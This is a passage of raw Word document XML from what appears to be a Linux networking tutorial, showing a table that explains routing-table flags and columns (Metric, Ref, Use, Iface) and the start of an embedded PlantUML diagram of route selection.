                <w:p w14:paraId="064B0953" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Genmask is 255.255.255.255 (/32)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="07B16962" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UGH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="079D9F2C" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="5E3DB330" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>R</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="001030C7" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Reinstate route for dynamic routing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="082BEAD5" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Kernel hint for daemons; rare in practice</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="17DCAB20" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UR</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="662E0A2B" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="44F01346" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>D</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4920463B" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Added dynamically (redirect/daemon)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="763318FA" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>ICMP redirect or routing daemon inserted it</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="21521CF8" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UD, UGD</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="1B70206C" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="0F48F6AE" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>M</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="7D2C29A1" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Modified dynamically (redirect/daemon)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="2245FD13" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Existing route changed by kernel/daemon</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="720A97D8" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UM, UGM</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="4C2A2460" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="379898E4" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="742E2B81" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Installed by address autoconf</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="2A47FB69" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>IPv6 autoconfiguration-created routes</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="2684B540" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UA</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="7EBD646A" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="07C265B3" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>C</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="47C429F1" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Cache entry</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4B89D8F1" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Per-destination cache (legacy/rare now)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="02547FF4" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>UC</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="003141FE" w:rsidRPr="00B25479" w14:paraId="48418999" w14:textId="77777777" w:rsidTr="00997120">
              <w:trPr>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="595" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="42C2403A" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                    </w:rPr>
                    <w:t>!</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4290" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="3126DC72" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Reject route (drop)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5010" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="3AE3C00E" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>Traffic is refused for that destination</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2025" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="4E4BAD3B" w14:textId="77777777" w:rsidR="003141FE" w:rsidRPr="00B25479" w:rsidRDefault="003141FE" w:rsidP="003141FE">
                  <w:pPr>
                    <w:pStyle w:val="NoSpacing"/>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00B25479">
                    <w:t>U!</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="31DAE48F" w14:textId="643815A5" w:rsidR="003141FE" w:rsidRDefault="003141FE" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="375656FC" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="15AD2FE9" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56B8BD4E" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0843374D" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Route cost or preference (lower is preferred)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="097676BC" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3013B432" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EF49EA1" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Reference count (legacy, often unused)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="0CA93DA7" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20B5C1AC" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EEDD948" w14:textId="77777777" w:rsidR="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Number of lookups for this route</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54BD039B" w14:textId="3CE35F04" w:rsidR="007C34E4" w:rsidRDefault="007C34E4" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="97"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>High number: This route is frequently used for forwarding traffic.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D39FE0" w14:textId="7D8B6907" w:rsidR="007C34E4" w:rsidRPr="00B25479" w:rsidRDefault="007C34E4" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="97"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Low or zero: Could mean the route is rarely used, is a backup path, or was just added.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25479" w:rsidRPr="00B25479" w14:paraId="029A0E57" w14:textId="77777777" w:rsidTr="00DF77E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53AEEB16" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:lastRenderedPageBreak/>
              <w:t>Iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12896" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="787D8667" w14:textId="77777777" w:rsidR="00B25479" w:rsidRPr="00B25479" w:rsidRDefault="00B25479" w:rsidP="00DF77E8">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B25479">
              <w:t>Outgoing network interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64B73F03" w14:textId="77777777" w:rsidR="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F94069" w14:textId="77777777" w:rsidR="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r>
        <w:t>This is how route selection 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7"/>
        <w:gridCol w:w="539"/>
      </w:tblGrid>
      <w:tr w:rsidR="0017552F" w14:paraId="24D789C5" w14:textId="77777777" w:rsidTr="007C55F6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4928F2AE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A392D8" wp14:editId="454548AD">
                  <wp:extent cx="10630894" cy="6281333"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="1187913763"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35885" cy="6284282"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42F2E4B0" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B3C07DB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam monochrome false</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4906472E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t>skinparam activity {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E59BD6" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BackgroundColor white</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53981857" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043172D">
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
              <w:t xml:space="preserve">  BorderColor black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CEA92E8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0043172D" w:rsidRDefault="0017552F" w:rsidP="007C55F6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="4"/>
                <w:szCs w:val="4"/>
              </w:rPr>
            </w:pPr>
